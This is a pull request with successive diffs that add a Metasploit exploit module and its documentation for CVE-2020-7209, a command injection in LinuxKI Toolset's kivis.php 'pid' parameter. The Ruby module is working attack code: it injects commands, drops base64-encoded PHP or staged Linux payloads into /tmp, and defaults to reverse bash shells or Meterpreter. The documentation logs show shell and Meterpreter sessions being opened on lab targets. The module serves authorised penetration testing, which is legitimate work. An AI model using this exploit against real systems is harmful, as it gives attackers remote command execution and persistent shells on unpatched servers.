### PR TITLE
Add new module linuxki_rce - CVE-2020-7209

### DIFF
--- a/documentation/modules/exploit/linux/http/linuxki_rce.md
+++ b/documentation/modules/exploit/linux/http/linuxki_rce.md
@@ -33,7 +33,7 @@ msf5 exploit(linux/http/linuxki_rce) > set rport 8080
 rport => 8080
 msf5 exploit(linux/http/linuxki_rce) > check
 [+] 10.0.0.1:8080 - The target is vulnerable.
-msf5 exploit(linux/http/linuxki_rce) > set lhost 10.0.0.1
+msf5 exploit(linux/http/linuxki_rce) > set lhost 10.0.0.5
 lhost => 10.0.0.5
 msf5 exploit(linux/http/linuxki_rce) > run
 

--- a/documentation/modules/exploit/linux/http/linuxki_rce.md
+++ b/documentation/modules/exploit/linux/http/linuxki_rce.md
@@ -1,5 +1,4 @@
 ## Vulnerable Application
-
 LinuxKI Toolset <= 6.01
 
 This module exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
@@ -13,10 +12,12 @@ the Dockerfile with [this one](https://github.com/HewlettPackard/LinuxKI/raw/v6.
 1. Install the application
 2. Start msfconsole
 3. Do: ```use exploit/linux/http/linuxki_rce```
-4. Do: ```set RHOSTS```
-4. Do: ```set LHOST```
-5. Do: ```run```
-6. You should get a shell.
+4. Do: ```show TARGETS```
+5. Do: ```set TARGET #```
+6. Do: ```set RHOSTS```
+7. Do: ```set LHOST```
+8. Do: ```run```
+9. You should get a shell.
 
 ## Options
 ### TARGETURI
@@ -32,7 +33,7 @@ A writable directory file system path. (default: `/tmp`)
 Override check result.
 
 ## Scenarios
-### LinuxKI Toolset v6.01
+### LinuxKI Toolset v6.01 on CentOS 7.8
 ```
 msf5 > use exploit/linux/http/linuxki_rce
 msf5 exploit(linux/http/linuxki_rce) > show targets

--- a/documentation/modules/exploit/linux/http/linuxki_rce.md
+++ b/documentation/modules/exploit/linux/http/linuxki_rce.md
@@ -23,24 +23,108 @@ the Dockerfile with [this one](https://github.com/HewlettPackard/LinuxKI/raw/v6.
 
 The directory where LinuxKI Toolset is installed
 
+### WritableDir
+
+A writable directory file system path. (default: `/tmp`)
+
+### ForceExploit
+
+Override check result.
+
 ## Scenarios
 ### LinuxKI Toolset v6.01
 ```
 msf5 > use exploit/linux/http/linuxki_rce
-msf5 exploit(linux/http/linuxki_rce) > set rhosts 10.0.0.1
-rhosts => 10.0.0.1
-msf5 exploit(linux/http/linuxki_rce) > set rport 8080
-rport => 8080
-msf5 exploit(linux/http/linuxki_rce) > check
-[+] 10.0.0.1:8080 - The target is vulnerable.
-msf5 exploit(linux/http/linuxki_rce) > set lhost 10.0.0.5
-lhost => 10.0.0.5
+msf5 exploit(linux/http/linuxki_rce) > show targets
+
+Exploit targets:
+
+   Id  Name
+   --  ----
+   0   Automatic (PHP In-Memory)
+   1   Automatic (PHP Dropper)
+   2   Automatic (Unix In-Memory)
+   3   Automatic (Linux Dropper)
+
+
+msf5 exploit(linux/http/linuxki_rce) > set rhosts 192.168.1.43
+rhosts => 192.168.1.43
+msf5 exploit(linux/http/linuxki_rce) > set rport 32769
+rport => 32769
 msf5 exploit(linux/http/linuxki_rce) > run
 
-[*] Started reverse TCP handler on 10.0.0.5:4444
-[*] Sending exploit...
-[*] Command shell session 1 opened (10.0.0.5:4444 -> 10.0.0.1:58914) at 2020-05-19 08:32:32 +0300
+[*] Started reverse TCP handler on 192.168.1.43:4444
+[*] Executing Automatic (PHP In-Memory) target
+[*] Sending payload...
+[*] Sending stage (38288 bytes) to 192.168.1.43
+[*] Meterpreter session 1 opened (192.168.1.43:4444 -> 192.168.1.43:53126) at 2020-06-07 20:27:10 +0300
 
-id
-uid=48(apache) gid=48(apache) groups=48(apache)
+meterpreter > sysinfo
+Computer    : 36503ef4f463
+OS          : Linux 36503ef4f463 4.19.76-linuxkit #1 SMP Fri Apr 3 15:53:26 UTC 2020 x86_64
+Meterpreter : php/linux
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 192.168.1.43 - Meterpreter session 1 closed.  Reason: User exit
+msf5 exploit(linux/http/linuxki_rce) > set target 1
+target => 1
+msf5 exploit(linux/http/linuxki_rce) > unset payload
+Unsetting payload...
+msf5 exploit(linux/http/linuxki_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.43:4444
+[*] Executing Automatic (PHP Dropper) target
+[*] Sending payload...
+[*] Sending stage (38288 bytes) to 192.168.1.43
+[*] Meterpreter session 2 opened (192.168.1.43:4444 -> 192.168.1.43:53133) at 2020-06-07 20:27:52 +0300
+[!] This exploit may require manual cleanup of '/tmp/kB4gJoH4xozwDdUva6tjqt.php' on the target
+
+meterpreter > sysinfo
+Computer    : 36503ef4f463
+OS          : Linux 36503ef4f463 4.19.76-linuxkit #1 SMP Fri Apr 3 15:53:26 UTC 2020 x86_64
+Meterpreter : php/linux
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 192.168.1.43 - Meterpreter session 2 closed.  Reason: User exit
+msf5 exploit(linux/http/linuxki_rce) > set target 2
+target => 2
+msf5 exploit(linux/http/linuxki_rce) > set payload cmd/unix/reverse_bash
+payload => cmd/unix/reverse_bash
+msf5 exploit(linux/http/linuxki_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.43:4444
+[*] Executing Automatic (Unix In-Memory) target
+[*] Sending payload...
+[*] Command shell session 3 opened (192.168.1.43:4444 -> 192.168.1.43:53141) at 2020-06-07 20:29:56 +0300
+
+uname -a
+Linux 36503ef4f463 4.19.76-linuxkit #1 SMP Fri Apr 3 15:53:26 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
+exit
+[*] 192.168.1.43 - Command shell session 3 closed.
+msf5 exploit(linux/http/linuxki_rce) > set target 3
+target => 3
+msf5 exploit(linux/http/linuxki_rce) > unset payload
+Unsetting payload...
+msf5 exploit(linux/http/linuxki_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.43:4444
+[*] Executing Automatic (Linux Dropper) target
+[*] Sending payload...
+[*] Sending stage (980808 bytes) to 192.168.1.43
+[*] Meterpreter session 4 opened (192.168.1.43:4444 -> 192.168.1.43:53146) at 2020-06-07 20:31:23 +0300
+[!] This exploit may require manual cleanup of '/tmp/ag6G4ssIKEpH3lDyL.php' on the target
+
+meterpreter > sysinfo
+Computer     : 172.17.0.2
+OS           : CentOS 7.8.2003 (Linux 4.19.76-linuxkit)
+Architecture : x64
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 172.17.0.2 - Meterpreter session 4 closed.  Reason: User exit
+msf5 exploit(linux/http/linuxki_rce) >
 ```

--- a/documentation/modules/exploit/linux/http/linuxki_rce.md
+++ b/documentation/modules/exploit/linux/http/linuxki_rce.md
@@ -1,0 +1,48 @@
+## Description
+
+This module exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution. The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
+
+
+## Vulnerable Application
+LinuxKI Toolset <= 6.01 
+
+To test this application, you need to download the version 6.01 [here](https://github.com/HewlettPackard/LinuxKI/blob/v6.0-1/Dockerfile).
+Do not forget to change [this URL](https://raw.githubusercontent.com/HewlettPackard/LinuxKI/master/rpms/linuxki-6.0-1.noarch.rpm) inside the Dockerfile with [this one](https://github.com/HewlettPackard/LinuxKI/raw/v6.0-1/rpms/linuxki-6.0-1.noarch.rpm).
+
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. `use exploit/linux/http/linuxki_rce`
+3. `set RHOST <target_ip>`
+4. `set RPORT <target_port>`
+5. `set LHOST <your_ip>`
+6. `set LPORT <your_port>`
+7. Ideally run `check`
+8. `set LHOST <your_ip>`
+9. `set LPORT <your_port>`
+10. Optional: `set TARGETURI <path_to_linuxki>` if target system uses a different path to LinuxKI
+11. `exploit`
+
+## Scenarios
+### LinuxKI Toolset v6.01
+
+```
+msf5 > use exploit/linux/http/linuxki_rce
+msf5 exploit(linux/http/linuxki_rce) > set rhosts 10.0.0.1
+rhosts => 10.0.0.1
+msf5 exploit(linux/http/linuxki_rce) > set rport 8080
+rport => 8080
+msf5 exploit(linux/http/linuxki_rce) > check
+[+] 10.0.0.1:8080 - The target is vulnerable.
+msf5 exploit(linux/http/linuxki_rce) > set lhost 10.0.0.5
+lhost => 10.0.0.5
+msf5 exploit(linux/http/linuxki_rce) > run
+
+[*] Started reverse TCP handler on 10.0.0.5:4444
+[*] Sending exploit...
+[*] Command shell session 1 opened (10.0.0.5:4444 -> 10.0.0.1:58914) at 2020-05-19 08:32:32 +0300
+
+id
+uid=48(apache) gid=48(apache) groups=48(apache)
+```

--- a/documentation/modules/exploit/linux/http/linuxki_rce.md
+++ b/documentation/modules/exploit/linux/http/linuxki_rce.md
@@ -1,32 +1,30 @@
-## Description
-
-This module exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution. The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
-
-
 ## Vulnerable Application
-LinuxKI Toolset <= 6.01 
+
+LinuxKI Toolset <= 6.01
+
+This module exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
+The `kivis.php` `pid` parameter received from the user is sent to the `shell_exec` function, resulting in security vulnerability.
 
 To test this application, you need to download the version 6.01 [here](https://github.com/HewlettPackard/LinuxKI/blob/v6.0-1/Dockerfile).
-Do not forget to change [this URL](https://raw.githubusercontent.com/HewlettPackard/LinuxKI/master/rpms/linuxki-6.0-1.noarch.rpm) inside the Dockerfile with [this one](https://github.com/HewlettPackard/LinuxKI/raw/v6.0-1/rpms/linuxki-6.0-1.noarch.rpm).
-
+Do not forget to change [this URL](https://raw.githubusercontent.com/HewlettPackard/LinuxKI/master/rpms/linuxki-6.0-1.noarch.rpm) inside
+the Dockerfile with [this one](https://github.com/HewlettPackard/LinuxKI/raw/v6.0-1/rpms/linuxki-6.0-1.noarch.rpm).
 
 ## Verification Steps
+1. Install the application
+2. Start msfconsole
+3. Do: ```use exploit/linux/http/linuxki_rce```
+4. Do: ```set RHOSTS```
+4. Do: ```set LHOST```
+5. Do: ```run```
+6. You should get a shell.
 
-1. Start `msfconsole`
-2. `use exploit/linux/http/linuxki_rce`
-3. `set RHOST <target_ip>`
-4. `set RPORT <target_port>`
-5. `set LHOST <your_ip>`
-6. `set LPORT <your_port>`
-7. Ideally run `check`
-8. `set LHOST <your_ip>`
-9. `set LPORT <your_port>`
-10. Optional: `set TARGETURI <path_to_linuxki>` if target system uses a different path to LinuxKI
-11. `exploit`
+## Options
+### TARGETURI
+
+The directory where LinuxKI Toolset is installed
 
 ## Scenarios
 ### LinuxKI Toolset v6.01
-
 ```
 msf5 > use exploit/linux/http/linuxki_rce
 msf5 exploit(linux/http/linuxki_rce) > set rhosts 10.0.0.1
@@ -35,7 +33,7 @@ msf5 exploit(linux/http/linuxki_rce) > set rport 8080
 rport => 8080
 msf5 exploit(linux/http/linuxki_rce) > check
 [+] 10.0.0.1:8080 - The target is vulnerable.
-msf5 exploit(linux/http/linuxki_rce) > set lhost 10.0.0.5
+msf5 exploit(linux/http/linuxki_rce) > set lhost 10.0.0.1
 lhost => 10.0.0.5
 msf5 exploit(linux/http/linuxki_rce) > run
 

--- a/documentation/modules/exploit/linux/http/linuxki_rce.md
+++ b/documentation/modules/exploit/linux/http/linuxki_rce.md
@@ -20,10 +20,6 @@ the Dockerfile with [this one](https://github.com/HewlettPackard/LinuxKI/raw/v6.
 9. You should get a shell.
 
 ## Options
-### TARGETURI
-
-The directory where LinuxKI Toolset is installed
-
 ### WritableDir
 
 A writable directory file system path. (default: `/tmp`)

--- a/modules/exploits/linux/http/linuxki_rce.rb
+++ b/modules/exploits/linux/http/linuxki_rce.rb
@@ -122,7 +122,9 @@ class MetasploitModule < Msf::Exploit::Remote
       execute_command("php -r '#{payload.encoded}'")
     when :unix_memory
       execute_command(payload.encoded)
-    when :php_dropper, :linux_dropper
+    when :linux_dropper
+      execute_cmdstager(linemax: 1_500)
+    when :php_dropper
       dropper
     end
 

--- a/modules/exploits/linux/http/linuxki_rce.rb
+++ b/modules/exploits/linux/http/linuxki_rce.rb
@@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'Author' =>
               [
                 'Cody Winkler', # discovery and poc
-                'numan turle' # msf exploit
+                'numan türle' # msf exploit
               ],
           'References' =>
               [

--- a/modules/exploits/linux/http/linuxki_rce.rb
+++ b/modules/exploits/linux/http/linuxki_rce.rb
@@ -67,8 +67,8 @@ class MetasploitModule < Msf::Exploit::Remote
         }
       })
 
-      fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if (res.code == 404) || (res.code == 403)
       fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+      fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if (res.code == 404) || (res.code == 403)
 
       if res && (res.code == 200) && res.body.include?(findstr)
         return CheckCode::Vulnerable

--- a/modules/exploits/linux/http/linuxki_rce.rb
+++ b/modules/exploits/linux/http/linuxki_rce.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(

--- a/modules/exploits/linux/http/linuxki_rce.rb
+++ b/modules/exploits/linux/http/linuxki_rce.rb
@@ -1,0 +1,107 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'LinuxKI Toolset 6.01 Remote Command Execution',
+        'Description' => %q{
+          This exploit is a remote code execution vulnerability in LinuxKI Toolset 6.01 and below.
+          The pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+            [
+              'Cody Winkler', # discovery and poc
+              'numan turle' # msf exploit
+            ],
+        'References' =>
+            [
+              ['EDB', '48483'],
+              ['CVE', '2020-7209'],
+              ['PACKETSTORM', '157739'],
+              ['URL', 'https://github.com/m0rph-1/CVE-2020-7209'],
+              ['URL', 'https://owasp.org/www-community/attacks/Command_Injection'],
+              ['URL', 'https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78']
+            ],
+        'Privileged' => false,
+        'Payload' =>
+            {
+              'DisableNops' => true,
+              'Compat' =>
+                    {
+                      'PayloadType' => 'cmd'
+                    }
+            },
+        'Platform' => %w[linux unix],
+        'Arch' => ARCH_CMD,
+        'DefaultOptions' =>
+            {
+              'payload' => 'cmd/unix/reverse_bash'
+            },
+        'Targets' => [['LinuxKI 6.01', {}],],
+        'DisclosureDate' => 'May 17 2020',
+        'DefaultTarget' => 0
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'The path to the web application', '/linuxki/experimental/vis/']),
+    ])
+  end
+
+  def check
+    begin
+      findstr = Rex::Text.rand_text_alphanumeric(10..15)
+      res = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, 'kivis.php'),
+        'vars_get' =>
+                                     {
+                                       'type' => 'kitrace',
+                                       'pid' => "1;echo '#{findstr}';"
+                                     }
+      })
+
+      if res && (res.code == 200) && res.body =~ /#{findstr}/
+        return CheckCode::Vulnerable
+      end
+
+      fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if (res.code == 404) || (res.code == 403)
+      fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+    CheckCode::Safe
+  end
+
+  def http_send_command(cmd)
+    begin
+      uri = normalize_uri(target_uri.path.to_s, 'kivis.php')
+      send_request_cgi({
+        'method' => 'GET',
+        'uri' => uri,
+        'vars_get' =>
+                               {
+                                 'type' => 'kitrace',
+                                 'pid' => '1;' + cmd + ';'
+                               }
+      })
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+  end
+
+  def exploit
+    print_status('Sending exploit...')
+    http_send_command(payload.encoded)
+  end
+
+end

--- a/modules/exploits/linux/http/linuxki_rce.rb
+++ b/modules/exploits/linux/http/linuxki_rce.rb
@@ -10,45 +10,42 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(
-      update_info(
-        info,
-        'Name' => 'LinuxKI Toolset 6.01 Remote Command Execution',
-        'Description' => %q{
-          This module exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
-          The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
-        },
-        'License' => MSF_LICENSE,
-        'Author' =>
-            [
-              'Cody Winkler', # discovery and poc
-              'numan turle' # msf exploit
-            ],
-        'References' =>
-            [
-              ['EDB', '48483'],
-              ['CVE', '2020-7209'],
-              ['PACKETSTORM', '157739'],
-              ['URL', 'https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78']
-            ],
-        'Privileged' => false,
-        'Payload' =>
-            {
-              'DisableNops' => true,
-              'Compat' =>
-                    {
-                      'PayloadType' => 'cmd'
-                    }
-            },
-        'Platform' => %w[linux unix],
-        'Arch' => ARCH_CMD,
-        'DefaultOptions' =>
-            {
-              'payload' => 'cmd/unix/reverse_bash'
-            },
-        'Targets' => [['LinuxKI 6.01', {}],],
-        'DisclosureDate' => 'May 17 2020',
-        'DefaultTarget' => 0
-      )
+        update_info(
+          info,
+          'Name' => 'LinuxKI Toolset 6.01 Remote Command Execution',
+          'Description' => %q{
+            This module exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
+            The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
+          },
+          'License' => MSF_LICENSE,
+          'Author' =>
+              [
+                'Cody Winkler', # discovery and poc
+                'numan turle' # msf exploit
+              ],
+          'References' =>
+              [
+                ['EDB', '48483'],
+                ['CVE', '2020-7209'],
+                ['PACKETSTORM', '157739'],
+                ['URL', 'https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78']
+              ],
+          'Privileged' => false,
+          'Platform' => %w[unix],
+          'Arch' => [ARCH_CMD],
+          'Targets' =>
+              [
+                [
+                  'Automatic (Unix In-Memory)',
+                  'Platform' => 'unix',
+                  'Arch' => ARCH_CMD,
+                  'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },
+                  'Type' => :unix_memory
+                ]
+              ],
+          'DisclosureDate' => 'May 17 2020',
+          'DefaultTarget' => 0
+        )
     )
 
     register_options([
@@ -57,46 +54,38 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    begin
-      findstr = Rex::Text.rand_text_alphanumeric(10..15)
-      res = send_request_cgi({
-        'uri' => normalize_uri(target_uri.path, 'linuxki/experimental/vis/', 'kivis.php'),
-        'vars_get' => {
-          'type' => 'kitrace',
-          'pid' => "1;echo '#{findstr}';"
-        }
-      })
-
-      fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
-      fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if (res.code == 404) || (res.code == 403)
-
-      if res && (res.code == 200) && res.body.include?(findstr)
-        return CheckCode::Vulnerable
-      end
-    rescue ::Rex::ConnectionError
-      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    findstr = Rex::Text.rand_text_alphanumeric(10..15)
+    res = execute_command("echo '#{findstr}'")
+    fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if (res.code == 404) || (res.code == 403)
+    if (res.code == 200) && res.body.include?(findstr)
+      return CheckCode::Vulnerable
     end
+
     CheckCode::Safe
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
   end
 
-  def http_send_command(cmd)
-    begin
-      send_request_cgi({
-        'method' => 'GET',
-        'uri' => normalize_uri(target_uri.path, 'linuxki/experimental/vis/', 'kivis.php'),
-        'vars_get' => {
-          'type' => 'kitrace',
-          'pid' => '1;' + cmd + ';'
-        }
-      })
-    rescue ::Rex::ConnectionError
-      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
-    end
+  def execute_command(cmd, _opts = {})
+    send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'linuxki/experimental/vis/', 'kivis.php'),
+      'vars_get' => {
+        'type' => 'kitrace',
+        'pid' => "1;#{cmd};"
+      }
+    })
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
   end
 
   def exploit
-    print_status('Sending exploit...')
-    http_send_command(payload.encoded)
+    print_status('Sending payload...')
+    if payload.arch.first == 'cmd'
+      execute_command(payload.encoded)
+    else
+      execute_cmdstager(linemax: 1_500)
+    end
   end
-
 end

--- a/modules/exploits/linux/http/linuxki_rce.rb
+++ b/modules/exploits/linux/http/linuxki_rce.rb
@@ -67,7 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote
         }
       })
 
-      fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
       fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if (res.code == 404) || (res.code == 403)
 
       if res && (res.code == 200) && res.body.include?(findstr)

--- a/modules/exploits/linux/http/linuxki_rce.rb
+++ b/modules/exploits/linux/http/linuxki_rce.rb
@@ -7,6 +7,8 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::PhpEXE
+  include Msf::Exploit::FileDropper
   include Msf::Exploit::CmdStager
 
   def initialize(info = {})
@@ -32,16 +34,35 @@ class MetasploitModule < Msf::Exploit::Remote
                 ['URL', 'https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78']
               ],
           'Privileged' => false,
-          'Platform' => %w[unix],
-          'Arch' => [ARCH_CMD],
+          'Platform' => ['php', 'unix', 'linux'],
+          'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64],
           'Targets' =>
               [
+                [
+                  'Automatic (PHP In-Memory)',
+                  'Platform' => 'php',
+                  'Arch' => ARCH_PHP,
+                  'Type' => :php_memory,
+                  'Payload' => { 'BadChars' => "'" }
+                ],
+                [
+                  'Automatic (PHP Dropper)',
+                  'Platform' => 'php',
+                  'Arch' => ARCH_PHP,
+                  'Type' => :php_dropper
+                ],
                 [
                   'Automatic (Unix In-Memory)',
                   'Platform' => 'unix',
                   'Arch' => ARCH_CMD,
-                  'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },
-                  'Type' => :unix_memory
+                  'Type' => :unix_memory,
+                  'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+                ],
+                [
+                  'Automatic (Linux Dropper)',
+                  'Platform' => 'linux',
+                  'Arch' => [ARCH_X86, ARCH_X64],
+                  'Type' => :linux_dropper
                 ]
               ],
           'DisclosureDate' => 'May 17 2020',
@@ -52,10 +73,14 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options([
       OptString.new('TARGETURI', [true, 'The path to the web application', '/']),
     ])
+    register_advanced_options([
+      OptBool.new('ForceExploit', [false, 'Override check result', false]),
+      OptString.new('WritableDir', [true, 'Writable dir for droppers', '/tmp'])
+    ])
   end
 
   def check
-    findstr = Rex::Text.rand_text_alphanumeric(10..15)
+    findstr = rand_str
     res = execute_command("echo '#{findstr}'")
     fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
     fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if (res.code == 404) || (res.code == 403)
@@ -82,11 +107,47 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    print_status('Sending payload...')
-    if payload.arch.first == 'cmd'
-      execute_command(payload.encoded)
-    else
-      execute_cmdstager(linemax: 1_500)
+    unless datastore['ForceExploit']
+      if check == CheckCode::Safe
+        fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
+      end
     end
+
+    print_status("Executing #{target.name} target")
+
+    print_status('Sending payload...')
+
+    case target['Type']
+    when :php_memory
+      execute_command("php -r '#{payload.encoded}'")
+    when :unix_memory
+      execute_command(payload.encoded)
+    when :php_dropper, :linux_dropper
+      dropper
+    end
+
+  end
+
+  def dropper
+    php_file = "#{rand_str}.php"
+    tmp_file = Pathname.new(
+      "#{datastore['WritableDir']}/#{php_file}"
+    ).cleanpath
+
+    dropper = get_write_exec_payload(
+      writable_path: datastore['WritableDir'],
+      unlink_self: true # Worth a shot
+    )
+
+    dropper = Rex::Text.encode_base64(dropper)
+
+    register_file_for_cleanup(tmp_file)
+
+    execute_command("echo #{dropper} | base64 -d | tee #{tmp_file}")
+    execute_command("php #{tmp_file}")
+  end
+
+  def rand_str
+    Rex::Text.rand_text_alphanumeric(8..42)
   end
 end

--- a/modules/exploits/linux/http/linuxki_rce.rb
+++ b/modules/exploits/linux/http/linuxki_rce.rb
@@ -14,8 +14,8 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'LinuxKI Toolset 6.01 Remote Command Execution',
         'Description' => %q{
-          This exploit is a remote code execution vulnerability in LinuxKI Toolset 6.01 and below.
-          The pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
+          This module exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
+          The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
         },
         'License' => MSF_LICENSE,
         'Author' =>
@@ -28,8 +28,6 @@ class MetasploitModule < Msf::Exploit::Remote
               ['EDB', '48483'],
               ['CVE', '2020-7209'],
               ['PACKETSTORM', '157739'],
-              ['URL', 'https://github.com/m0rph-1/CVE-2020-7209'],
-              ['URL', 'https://owasp.org/www-community/attacks/Command_Injection'],
               ['URL', 'https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78']
             ],
         'Privileged' => false,
@@ -54,7 +52,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([
-      OptString.new('TARGETURI', [true, 'The path to the web application', '/linuxki/experimental/vis/']),
+      OptString.new('TARGETURI', [true, 'The path to the web application', '/']),
     ])
   end
 
@@ -62,20 +60,19 @@ class MetasploitModule < Msf::Exploit::Remote
     begin
       findstr = Rex::Text.rand_text_alphanumeric(10..15)
       res = send_request_cgi({
-        'uri' => normalize_uri(target_uri.path, 'kivis.php'),
-        'vars_get' =>
-                                     {
-                                       'type' => 'kitrace',
-                                       'pid' => "1;echo '#{findstr}';"
-                                     }
+        'uri' => normalize_uri(target_uri.path, 'linuxki/experimental/vis/', 'kivis.php'),
+        'vars_get' => {
+          'type' => 'kitrace',
+          'pid' => "1;echo '#{findstr}';"
+        }
       })
-
-      if res && (res.code == 200) && res.body =~ /#{findstr}/
-        return CheckCode::Vulnerable
-      end
 
       fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if (res.code == 404) || (res.code == 403)
       fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+
+      if res && (res.code == 200) && res.body.include?(findstr)
+        return CheckCode::Vulnerable
+      end
     rescue ::Rex::ConnectionError
       fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
     end
@@ -84,15 +81,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def http_send_command(cmd)
     begin
-      uri = normalize_uri(target_uri.path.to_s, 'kivis.php')
       send_request_cgi({
         'method' => 'GET',
-        'uri' => uri,
-        'vars_get' =>
-                               {
-                                 'type' => 'kitrace',
-                                 'pid' => '1;' + cmd + ';'
-                               }
+        'uri' => normalize_uri(target_uri.path, 'linuxki/experimental/vis/', 'kivis.php'),
+        'vars_get' => {
+          'type' => 'kitrace',
+          'pid' => '1;' + cmd + ';'
+        }
       })
     rescue ::Rex::ConnectionError
       fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")

--- a/modules/exploits/linux/http/linuxki_rce.rb
+++ b/modules/exploits/linux/http/linuxki_rce.rb
@@ -43,13 +43,15 @@ class MetasploitModule < Msf::Exploit::Remote
                   'Platform' => 'php',
                   'Arch' => ARCH_PHP,
                   'Type' => :php_memory,
-                  'Payload' => { 'BadChars' => "'" }
+                  'Payload' => { 'BadChars' => "'" },
+                  'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }
                 ],
                 [
                   'Automatic (PHP Dropper)',
                   'Platform' => 'php',
                   'Arch' => ARCH_PHP,
-                  'Type' => :php_dropper
+                  'Type' => :php_dropper,
+                  'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }
                 ],
                 [
                   'Automatic (Unix In-Memory)',
@@ -62,7 +64,8 @@ class MetasploitModule < Msf::Exploit::Remote
                   'Automatic (Linux Dropper)',
                   'Platform' => 'linux',
                   'Arch' => [ARCH_X86, ARCH_X64],
-                  'Type' => :linux_dropper
+                  'Type' => :linux_dropper,
+                  'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
                 ]
               ],
